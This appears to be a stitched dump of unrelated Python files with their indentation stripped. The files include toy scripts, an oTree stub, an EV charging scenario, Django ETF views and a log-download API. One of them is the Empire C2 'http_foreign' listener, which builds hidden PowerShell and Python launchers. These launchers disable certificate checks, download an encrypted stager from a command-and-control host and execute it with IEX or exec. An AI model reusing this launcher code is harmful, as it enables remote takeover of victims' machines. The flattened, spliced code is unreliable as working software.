|
algo = input('Type something: ')
print('The primitive type of algo is', type(algo))
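# A small extension (illustrative): input() always returns str, so these
# checks inspect the string's contents rather than converting it.
print('Is it numeric?', algo.isnumeric())
print('Is it alphabetic?', algo.isalpha())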
|
nilq/baby-python
|
python
|
from __future__ import print_function
import base64
import random
from builtins import object, str
from textwrap import dedent
from typing import List
from empire.server.common import helpers, packets
from empire.server.utils import data_util, listener_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
"Name": "HTTP[S]",
"Author": ["@harmj0y"],
"Description": ("Starts a 'foreign' http[s] Empire listener."),
"Category": ("client_server"),
"Comments": [],
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
"Name": {
"Description": "Name for the listener.",
"Required": True,
"Value": "http_foreign",
},
"Host": {
"Description": "Hostname/IP for staging.",
"Required": True,
"Value": "http://%s" % (helpers.lhost()),
},
"Port": {
"Description": "Port for the listener.",
"Required": True,
"Value": "",
},
"Launcher": {
"Description": "Launcher string.",
"Required": True,
"Value": "powershell -noP -sta -w 1 -enc ",
},
"StagingKey": {
"Description": "Staging key for initial agent negotiation.",
"Required": True,
"Value": "2c103f2c4ed1e59c0b4e2e01821770fa",
},
"DefaultDelay": {
"Description": "Agent delay/reach back interval (in seconds).",
"Required": True,
"Value": 5,
},
"DefaultJitter": {
"Description": "Jitter in agent reachback interval (0.0-1.0).",
"Required": True,
"Value": 0.0,
},
"DefaultLostLimit": {
"Description": "Number of missed checkins before exiting",
"Required": True,
"Value": 60,
},
"DefaultProfile": {
"Description": "Default communication profile for the agent.",
"Required": True,
"Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
},
"KillDate": {
"Description": "Date for the listener to exit (MM/dd/yyyy).",
"Required": False,
"Value": "",
},
"WorkingHours": {
"Description": "Hours for the agent to operate (09:00-17:00).",
"Required": False,
"Value": "",
},
"SlackURL": {
"Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.",
"Required": False,
"Value": "",
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
# set the default staging key to the controller db default
self.options["StagingKey"]["Value"] = str(
data_util.get_config("staging_key")[0]
)
def default_response(self):
"""
If there's a default response expected from the server that the client needs to ignore,
(i.e. a default HTTP page), put the generation here.
"""
return ""
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
for key in self.options:
if self.options[key]["Required"] and (
str(self.options[key]["Value"]).strip() == ""
):
print(helpers.color('[!] Option "%s" is required.' % (key)))
return False
return True
def generate_launcher(
self,
encode=True,
obfuscate=False,
obfuscationCommand="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
language=None,
safeChecks="",
listenerName=None,
bypasses: List[str] = None,
):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): no language specified!"
)
)
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][
"options"
]
host = listenerOptions["Host"]["Value"]
launcher = listenerOptions["Launcher"]["Value"]
stagingKey = listenerOptions["StagingKey"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
uris = [a for a in profile.split("|")[0].split(",")]
stage0 = random.choice(uris)
customHeaders = profile.split("|")[2:]
if language.startswith("po"):
# PowerShell
stager = '$ErrorActionPreference = "SilentlyContinue";'
if safeChecks.lower() == "true":
stager = "If($PSVersionTable.PSVersion.Major -ge 3){"
for bypass in bypasses:
stager += bypass
stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;"
stager += "$wc=New-Object System.Net.WebClient;"
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
stager += f"$u='{ userAgent }';"
if "https" in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != "none" or proxy.lower() != "none":
if userAgent.lower() != "none":
stager += "$wc.Headers.Add('User-Agent',$u);"
if proxy.lower() != "none":
if proxy.lower() == "default":
stager += (
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;"
)
else:
# TODO: implement form for other proxy
stager += "$proxy=New-Object Net.WebProxy;"
stager += f"$proxy.Address = '{ proxy.lower() }';"
stager += "$wc.Proxy = $proxy;"
if proxyCreds.lower() == "default":
stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;"
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
stager += f"$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');"
stager += f"$wc.Proxy.Credentials = $netcred;"
# TODO: reimplement stager retries?
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(":")[0]
headerValue = header.split(":")[1]
stager += f'$wc.Headers.Add("{ headerKey }","{ headerValue }");'
# code to turn the key string into a byte array
stager += (
f"$K=[System.Text.Encoding]::ASCII.GetBytes('{ stagingKey }');"
)
# this is the minimized RC4 stager code from rc4.ps1
stager += listener_util.powershell_rc4()
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(
stagingKey,
sessionID="00000000",
language="POWERSHELL",
meta="STAGE0",
additional="None",
encData="",
)
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += f'$wc.Headers.Add("Cookie","session={ b64RoutingPacket.decode("UTF-8") }");'
stager += f"$ser= { helpers.obfuscate_call_home_address(host) };$t='{ stage0 }';"
stager += "$data=$wc.DownloadData($ser+$t);"
stager += "$iv=$data[0..3];$data=$data[4..$data.length];"
# decode everything and kick it over to IEX to kick off execution
stager += "-join[Char[]](& $R $data ($IV+$K))|IEX"
# Remove comments and make one line
stager = helpers.strip_powershell_comments(stager)
stager = data_util.ps_convert_to_oneliner(stager)
if obfuscate:
stager = data_util.obfuscate(
self.mainMenu.installPath,
stager,
obfuscationCommand=obfuscationCommand,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscationCommand.lower())
):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith("py"):
# Python
launcherBase = "import sys;"
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == "true":
launcherBase += listener_util.python_safe_checks()
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print(helpers.color(p, color="red"))
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
launcherBase += dedent(
f"""
o=__import__({{2:'urllib2',3:'urllib.request'}}[sys.version_info[0]],fromlist=['build_opener']).build_opener();
UA='{userAgent}';
server='{host}';t='{stage0}';
"""
)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(
stagingKey,
sessionID="00000000",
language="POWERSHELL",
meta="STAGE0",
additional="None",
encData="",
)
b64RoutingPacket = base64.b64encode(routingPacket).decode("UTF-8")
# add the RC4 packet to a cookie
launcherBase += (
'o.addheaders=[(\'User-Agent\',UA), ("Cookie", "session=%s")];\n'
% (b64RoutingPacket)
)
launcherBase += "import urllib.request;\n"
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
                        proto = proxy.split(":")[0]
launcherBase += (
"proxy = urllib.request.ProxyHandler({'"
+ proto
+ "':'"
+ proxy
+ "'});\n"
)
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
launcherBase += (
"proxy_auth_handler.add_password(None,'"
+ proxy
+ "','"
+ username
+ "','"
+ password
+ "');\n"
)
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=o.open(server+t).read();\n"
# download the stager and extract the IV
launcherBase += listener_util.python_extract_stager(stagingKey)
if encode:
launchEncoded = base64.b64encode(
launcherBase.encode("UTF-8")
).decode("UTF-8")
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode("UTF-8")
launcher = (
"echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &"
% (launchEncoded)
)
return launcher
else:
return launcherBase
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module."
)
)
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_launcher(): invalid listener name specification!"
)
)
def generate_stager(
self,
listenerOptions,
encode=False,
encrypt=True,
obfuscate=False,
obfuscationCommand="",
language=None,
):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
"""
print(
helpers.color(
"[!] generate_stager() not implemented for listeners/template"
)
)
return ""
def generate_agent(
self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""
):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
print(
helpers.color("[!] generate_agent() not implemented for listeners/template")
)
return ""
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == "powershell":
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (
listenerOptions["Host"]["Value"]
)
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc= New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = listener_util.powershell_send_message()
return updateServers + getTask + sendMessage
elif language.lower() == "python":
updateServers = "server = '%s'\n" % (listenerOptions["Host"]["Value"])
# Import sockschain code
f = open(
self.mainMenu.installPath
+ "/data/agent/stagers/common/sockschain.py"
)
socks_import = f.read()
f.close()
sendMessage = listener_util.python_send_message(self.session_cookie)
return socks_import + updateServers + sendMessage
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module."
)
)
else:
print(
helpers.color(
"[!] listeners/http_foreign generate_comms(): no language specified!"
)
)
def start(self, name=""):
"""
        Nothing to actually start for a foreign listener.
"""
return True
def shutdown(self, name=""):
"""
Nothing to actually shut down for a foreign listner.
"""
pass
|
nilq/baby-python
|
python
|
from blackpearl.modules import Module
from blackpearl.modules import Timer
from blackpearl.projects import Project
class MyTimer(Timer):
tick = 0.1
def setup(self):
self.start()
class Listener(Module):
listening_for = ['timer']
def receive(self, message):
print(message['timer']['time'])
class MyProject(Project):
modules_required = [MyTimer, Listener,]
if __name__ == '__main__':
MyProject()
|
nilq/baby-python
|
python
|
from otree.api import *
c = Currency
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'payment_info'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
class Player(BasePlayer):
pass
# PAGES
class PaymentInfo(Page):
pass
page_sequence = [PaymentInfo]
|
nilq/baby-python
|
python
|
from src.grid.electrical_vehicle import EV
from collections import defaultdict
from typing import List
import numpy as np
class Scenario:
def __init__(self,
load_inds: list,
timesteps_hr: np.ndarray,
evs: List[EV],
power_price: np.ndarray,
):
""" Scenario aggregates information about EVs and power price .
load_inds -- indicis of the load nodes in the grid
timesteps_hr -- array of the timesteps
evs -- list of the EVs
power_price -- array specifying power price. Should have the same shape as timesteps_hr """
self.load_inds = load_inds
self.n_loads = len(load_inds)
self.power_price = power_price
self._setup_times(timesteps_hr)
self._setup_evs(evs)
assert power_price.shape == self.timesteps_hr.shape, 'Timesteps and power price shapes must be equal'
def _setup_times(self, timesteps_hr):
self.timesteps_hr = timesteps_hr
self.t_start_hr = timesteps_hr[0]
self.t_start_ind = 0
self.t_end_hr = timesteps_hr[-1]
self.n_timesteps = len(self.timesteps_hr)
self.t_end_ind = self.n_timesteps - 1
self.ptu_size_hr = timesteps_hr[1] - timesteps_hr[0]
self.ptu_size_minutes = int(60 * self.ptu_size_hr)
def _setup_evs(self, evs):
self.evs = evs
self.load_evs_presence = {load_ind: defaultdict(list) for load_ind in self.load_inds}
self.ev_status = defaultdict(dict)
self.t_ind_arrivals = defaultdict(list)
self.t_ind_departures = defaultdict(list)
self.t_ind_charging_evs = defaultdict(list)
self.load_ind_business = {load_ind: np.zeros(self.n_timesteps) for load_ind in self.load_inds}
for ev in evs:
# ev.utility_coef /= self.norm_factor
t_arr_ind = int(ev.t_arr_hr / self.ptu_size_hr)
t_dep_ind = int(ev.t_dep_hr / self.ptu_size_hr)
            assert t_arr_ind == ev.t_arr_hr / self.ptu_size_hr and t_dep_ind == ev.t_dep_hr / self.ptu_size_hr, \
                'EV arrival and departure times must be multiples of the PTU size!'
self.load_ind_business[ev.load_ind][t_arr_ind: t_dep_ind] = True
for t_ind in range(self.timesteps_hr.shape[0]):
if t_ind < t_arr_ind:
self.ev_status[ev][t_ind] = 'inactive'
elif t_ind == t_arr_ind:
self.ev_status[ev][t_ind] = 'arrive'
self.t_ind_arrivals[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_arr_ind < t_ind < t_dep_ind:
self.ev_status[ev][t_ind] = 'active'
self.t_ind_charging_evs[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_ind == t_dep_ind:
self.ev_status[ev][t_ind] = 'depart'
self.t_ind_departures[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_ind > t_dep_ind:
self.ev_status[ev][t_ind] = 'inactive'
def get_evs_known_at_t_ind(self, t_ind: int) -> List[EV]:
evs_known_at_t_ind = [ev for ev in self.evs if int(ev.t_arr_hr / self.ptu_size_hr) <= t_ind]
return evs_known_at_t_ind
def create_scenario_unknown_future(self, t_ind):
evs_known_at_t_ind = self.get_evs_known_at_t_ind(t_ind)
return Scenario(self.load_inds, self.timesteps_hr, evs_known_at_t_ind, self.power_price)
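# Hedged usage sketch (assumption: EV's constructor accepts the attributes this
# class reads -- load_ind, t_arr_hr, t_dep_hr; the real signature may differ).
if __name__ == '__main__':
    timesteps_hr = np.arange(0.0, 24.0, 0.25)          # 15-minute PTUs
    power_price = np.ones_like(timesteps_hr)           # flat price, illustrative
    ev = EV(load_ind=0, t_arr_hr=8.0, t_dep_hr=17.0)   # hypothetical signature
    scenario = Scenario(load_inds=[0], timesteps_hr=timesteps_hr, evs=[ev], power_price=power_price)
    print(scenario.n_timesteps, scenario.ptu_size_minutes)  # 96 15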
|
nilq/baby-python
|
python
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
import django.contrib.auth as auth
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from apps import EftConfig
from . import models as etf_models
import json
from parser import parse_by_symbol
def index(request):
return render(request, 'index.html', {})
def signup_view(request):
return render(request, 'signup.html', {})
def login(request):
if 'POST' != request.method:
return render(request, 'message.html',
{'message': 'login failed1'}, status=400)
if 'username' not in request.POST or 'password' not in request.POST:
return render(request, 'message.html',
{'message': 'login failed2'}, status=400)
username = request.POST['username']
password = request.POST['password']
# TODO more careful username and password validation
if username == '' or password == '':
return render(request, 'message.html',
{'message': 'login failed3'}, status=400)
# validation
user = auth.authenticate(username=username, password=password)
    if user is None:
return render(request, 'message.html',
{'message': 'login failed4'}, status=400)
# login
auth.login(request, user)
# then redirect
return redirect('search')
def signup(request):
if 'POST' != request.method:
return render(request, 'message.html',
{'message': 'signup failed1'}, status=400)
post_data = request.POST
if 'username' not in post_data or 'password' not in post_data or \
'email' not in post_data or 'first_name' not in post_data or \
'last_name' not in post_data:
return render(request, 'message.html',
{'message': 'signup failed2'}, status=400)
username = post_data['username']
password = post_data['password']
email = post_data['email']
first_name = post_data['first_name']
last_name = post_data['last_name']
# TODO validate the input
try:
user = User.objects.create_user(username=username, password=password, email=email, first_name=first_name,
last_name=last_name)
user.save()
except Exception as e:
return render(request, 'message.html',
{'message': str(e)}, status=400)
return render(request, 'message.html',
{'message': 'register successfully'}, status=200)
def logout(request):
auth.logout(request)
return redirect('index')
@login_required
def search(request):
return render(request, 'search.html')
@login_required
def history(request):
return render(request, 'history.html')
### ajax apis #######
@login_required
def _history(request):
if not request.is_ajax():
return HttpResponse(json.dumps({'error': 'bad header'}), status=404,
content_type='application/json')
user = request.user
response_data = {
'records': [],
}
for record in etf_models.EtfRecord.objects.filter(user_id=user.id):
r = {}
r['symbol'] = record.symbol
r['etf_name'] = record.etf_name
r['fund_description'] = record.fund_description
response_data['records'].append(r)
return HttpResponse(json.dumps(response_data), status=200, content_type='application/json')
@login_required
def _search(request):
'''
data format example: {'symbol': 'DTS'}
'''
user = request.user
if 'GET' != request.method or not request.is_ajax():
return HttpResponse(json.dumps({'error': 'bad header'}), status=404,
content_type='application/json')
record = None
    try:
# TODO validate the data,
symbol = request.GET['symbol']
# getting from db if possible
data = etf_models.EtfRecord.objects.filter(symbol=symbol)
if (len(data) > 0):
# no need to query again, it is in the db.
record = data[0]
except Exception as error:
error_msg = {
'error': str(error),
'user_msg': 'Server encountered an error'
}
return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400)
try:
        if record is None:
# need to parse from the website
etf_data = parse_by_symbol(symbol)
# save it to db
record = etf_models.EtfRecord.objects.create(user=user, symbol=etf_data['symbol'],
etf_name=etf_data['etf_name'],
fund_description=etf_data['fund_description'])
record.save()
for holding in etf_data['top_10_holdings']:
h = etf_models.Holding.objects.create(record=record, name=holding['name'],
weight=holding['weight'], shares=holding['shares'])
h.save()
for country_weight in etf_data['country_weights']:
cw = etf_models.CountryWeights.objects.create(record=record, country=country_weight['country'],
weight=country_weight['weight'])
cw.save()
for sector_weight in etf_data['sector_weights']:
sw = etf_models.SectorWeights.objects.create(record=record, sector=sector_weight['sector'],
weight=sector_weight['weight'])
sw.save()
except Exception as error:
# undo possible changes to db
data = etf_models.EtfRecord.objects.filter(symbol=symbol)
if (len(data) > 0):
record = data[0]
record.delete()
error_msg = {
'error': str(error),
'user_msg': 'invalid symbol'
}
# raise error # for debug
return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400)
# construct response
response_data = {}
response_data['fund_description'] = record.fund_description
    response_data['etf_name'] = record.etf_name
response_data['symbol'] = symbol
top_10_holdings = []
for h in record.holding_set.all():
top_10_holdings.append({
'name': h.name,
'weight': h.weight,
'shares': h.shares
})
country_weights = []
for w in record.countryweights_set.all():
country_weights.append({
'country': w.country,
'weight': w.weight
})
sector_weights = []
for w in record.sectorweights_set.all():
sector_weights.append({
'sector': w.sector,
'weight': w.weight
})
response_data['top_10_holdings'] = top_10_holdings
response_data['country_weights'] = country_weights
response_data['sector_weights'] = sector_weights
return HttpResponse(json.dumps(response_data), status=200,
content_type='application/json')
@login_required
def download(request, table, symbol):
user = request.user
records = etf_models.EtfRecord.objects.filter(symbol=symbol)
if len(records) < 1:
return HttpResponse(status=404)
record = records[0]
if 'top10holdings' == table:
csv_data = 'name,weight,shares\n'
for holding in record.holding_set.all():
csv_data += '{0},{1},{2}\n'.format(holding.name, holding.weight, holding.shares)
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="holdings.csv"'
return response
elif 'countryweights' == table:
csv_data = 'country,weight\n'
for cw in record.countryweights_set.all():
csv_data += '{0},{1}\n'.format(cw.country, str(cw.weight)+'%')
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="country weight.csv"'
return response
elif 'sectorweights' == table:
csv_data = 'sector,weight\n'
for sw in record.sectorweights_set.all():
csv_data += '{0},{1}\n'.format(sw.sector, str(sw.weight)+'%')
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="sector weight.csv"'
return response
else:
return HttpResponse(status=404)
|
nilq/baby-python
|
python
|
from django.http import HttpResponse, StreamingHttpResponse
from django.views.decorators.csrf import csrf_exempt
from gzip import GzipFile
import tarfile
from io import BytesIO
from datetime import datetime
import json
import traceback
from psycopg2 import OperationalError
from interface.settings import PREVIEW_LIMIT, POSTGRES_CONFIG, FIELD_DESCRIPTIONS, HEARTBEAT, BASE_DIR, LOGS_TIME_BUFFER
from .postgresql_manager import PostgreSQL_Manager
import threading
import time
from .input_validator import load_and_validate_columns, load_and_validate_constraints, load_and_validate_date, load_and_validate_order_clauses
from logger_manager import LoggerManager
PGM = PostgreSQL_Manager(POSTGRES_CONFIG, FIELD_DESCRIPTIONS.keys(), LOGS_TIME_BUFFER)
LOGGER = LoggerManager(logger_name='opendata-interface', module_name='opendata',
heartbeat_dir=HEARTBEAT['dir'])
def heartbeat():
while True:
try:
PGM.get_min_and_max_dates()
LOGGER.log_heartbeat('Scheduled heartbeat', HEARTBEAT['api_file'], 'SUCCEEDED')
except OperationalError as operational_error:
LOGGER.log_heartbeat('PostgreSQL error: {0}'.format(str(operational_error).replace('\n', ' ')),
HEARTBEAT['api_file'], 'FAILED')
except Exception as exception:
LOGGER.log_heartbeat('Error: {0}'.format(str(exception).replace('\n', ' ')),
HEARTBEAT['api_file'], 'FAILED')
time.sleep(HEARTBEAT['interval'])
heartbeat_thread = threading.Thread(target=heartbeat)
heartbeat_thread.daemon = True
heartbeat_thread.start()
@csrf_exempt
def get_daily_logs(request):
try:
if request.method == 'GET':
request_data = request.GET
else:
request_data = json.loads(request.body.decode('utf8'))
date = load_and_validate_date(request_data.get('date', ''))
columns = load_and_validate_columns(request_data.get('columns', '[]'))
constraints = load_and_validate_constraints(request_data.get('constraints', '[]'))
order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]'))
except Exception as exception:
LOGGER.log_error('api_daily_logs_query_validation_failed',
'Failed to validate daily logs query. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(json.dumps({'error': str(exception)}), status=400)
try:
gzipped_file = _generate_gzipped_file(date, columns, constraints, order_clauses)
response = HttpResponse(gzipped_file, content_type='application/gzip')
response['Content-Disposition'] = 'attachment; filename="{0:04d}-{1:02d}-{2:02d}@{3}.tar.gz"'.format(
date.year, date.month, date.day, int(datetime.now().timestamp())
)
return response
except Exception as exception:
LOGGER.log_error('api_daily_logs_query_failed', 'Failed retrieving daily logs. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when generating gzipped tarball.'}),
status=500
)
@csrf_exempt
def get_preview_data(request):
try:
if request.method == 'GET':
request_data = request.GET
else:
request_data = json.loads(request.body.decode('utf8'))
date = load_and_validate_date(request_data.get('date', ''))
columns = load_and_validate_columns(request_data.get('columns', '[]'))
constraints = load_and_validate_constraints(request_data.get('constraints', '[]'))
order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]'))
except Exception as exception:
LOGGER.log_error('api_preview_data_query_validation_failed',
'Failed to validate daily preview data query. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(json.dumps({'error': str(exception)}), status=400)
try:
rows, _, _ = _get_content(date, columns, constraints, order_clauses, PREVIEW_LIMIT)
return_value = {'data': [[str(element) for element in row] for row in rows]}
return HttpResponse(json.dumps(return_value))
except Exception as exception:
LOGGER.log_error('api_preview_data_query_failed', 'Failed retrieving daily preview data. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when delivering dataset sample.'}),
status=500
)
@csrf_exempt
def get_date_range(request):
try:
min_date, max_date = PGM.get_min_and_max_dates()
return HttpResponse(json.dumps({'date': {'min': str(min_date), 'max': str(max_date)}}))
except Exception as exception:
LOGGER.log_error('api_date_range_query_failed', 'Failed retrieving date range for logs. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when calculating min and max dates.'}),
status=500
)
@csrf_exempt
def get_column_data(request):
postgres_to_python_type = {'varchar(255)': 'string', 'bigint': 'integer', 'integer': 'integer',
'date': 'date (YYYY-MM-DD)', 'boolean': 'boolean'}
type_to_operators = {
'string': ['=', '!='],
'boolean': ['=', '!='],
'integer': ['=', '!=', '<', '<=', '>', '>='],
'date (YYYY-MM-DD)': ['=', '!=', '<', '<=', '>', '>='],
}
try:
data = []
for column_name in FIELD_DESCRIPTIONS:
datum = {'name': column_name}
datum['description'] = FIELD_DESCRIPTIONS[column_name]['description']
datum['type'] = postgres_to_python_type[FIELD_DESCRIPTIONS[column_name]['type']]
datum['valid_operators'] = type_to_operators[datum['type']]
data.append(datum)
return HttpResponse(json.dumps({'columns': data}))
except Exception as exception:
LOGGER.log_error('api_column_data_query_failed', 'Failed retrieving column data. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when listing column data.'}),
status=500
)
def _generate_gzipped_file(date, columns, constraints, order_clauses):
rows, columns, date_columns = _get_content(date, columns, constraints, order_clauses)
tarball_bytes = BytesIO()
with tarfile.open(fileobj=tarball_bytes, mode='w:gz') as tarball:
data_file, data_info = _generate_json_file(columns, rows, date_columns, date)
meta_file, meta_info = _generate_meta_file(columns, constraints, order_clauses, date_columns)
tarball.addfile(data_info, data_file)
tarball.addfile(meta_info, meta_file)
return tarball_bytes.getvalue()
def _get_content(date, columns, constraints, order_clauses, limit=None):
constraints.append({'column': 'requestInDate', 'operator': '=', 'value': date.strftime('%Y-%m-%d')})
column_names_and_types = PGM.get_column_names_and_types()
if not columns: # If no columns are specified, all must be returned
columns = [column_name for column_name, _ in column_names_and_types]
date_columns = [column_name for column_name, column_type in column_names_and_types
if column_type == 'date' and column_name in columns]
rows = PGM.get_data(constraints=constraints, columns=columns, order_by=order_clauses, limit=limit)
return rows, columns, date_columns
def _generate_json_file(column_names, rows, date_columns, date):
json_content = []
for row in rows:
json_obj = {column_name: row[column_idx] for column_idx, column_name in enumerate(column_names)}
for date_column in date_columns: # Must manually convert Postgres dates to string to be compatible with JSON format
json_obj[date_column] = datetime.strftime(json_obj[date_column], '%Y-%m-%d')
json_content.append(json.dumps(json_obj))
json_content.append('') # Hack to get \n after the last JSON object
json_file_content = ('\n'.join(json_content)).encode('utf8')
info = tarfile.TarInfo(date.strftime('%Y-%m-%d') + '.json')
info.size = len(json_file_content)
info.mtime = time.time()
return BytesIO(json_file_content), info
def _generate_meta_file(columns, constraints, order_clauses, date_columns):
if 'requestInDate' not in date_columns:
date_columns += ['requestInDate']
meta_dict = {}
meta_dict['descriptions'] = {field: FIELD_DESCRIPTIONS[field]['description'] for field in FIELD_DESCRIPTIONS}
meta_dict['query'] = {'fields': columns, 'constraints': constraints,
'order_by': [' '.join(order_clause) for order_clause in order_clauses]}
content = json.dumps(meta_dict).encode('utf8')
info = tarfile.TarInfo('meta.json')
info.size = len(content)
info.mtime = time.time()
return BytesIO(content), info
def _gzip_content(content):
output_bytes = BytesIO()
with GzipFile(fileobj=output_bytes, mode='wb') as gzip_file:
input_bytes = BytesIO(content.encode('utf8'))
gzip_file.writelines(input_bytes)
return output_bytes.getvalue()
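# A minimal round-trip sketch for the _gzip_content helper above (illustrative only; the payload
# string is made up, and the __main__ guard keeps it from running on import, which matters here
# because importing this module starts the heartbeat thread).
if __name__ == '__main__':
    from gzip import decompress
    _payload = _gzip_content('{"hello": "opendata"}')
    assert decompress(_payload).decode('utf8') == '{"hello": "opendata"}'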
|
nilq/baby-python
|
python
|
import os.path
from PIL import Image
import json
appdata_folder = os.path.join(os.environ["LOCALAPPDATA"], "Nightshift")
def generate_wallpapers(day_img_path, night_img_path, step_count):
print "Generating {0} images from {1} and {2} to {3}"\
.format(step_count, day_img_path, night_img_path, appdata_folder)
if not os.path.exists(day_img_path) or not os.path.exists(night_img_path) \
or os.path.isdir(day_img_path) or os.path.isdir(night_img_path):
raise IOError("Day image or night image not found.")
_, day_ext = os.path.splitext(day_img_path)
_, night_ext = os.path.splitext(night_img_path)
if day_ext not in [".jpeg", ".jpg"] or night_ext not in [".jpeg", ".jpg"]:
print "Images will be converted to .jpg."
try:
day_image = Image.open(day_img_path)
night_image = Image.open(night_img_path)
except IOError:
print "Could not read image files."
raise
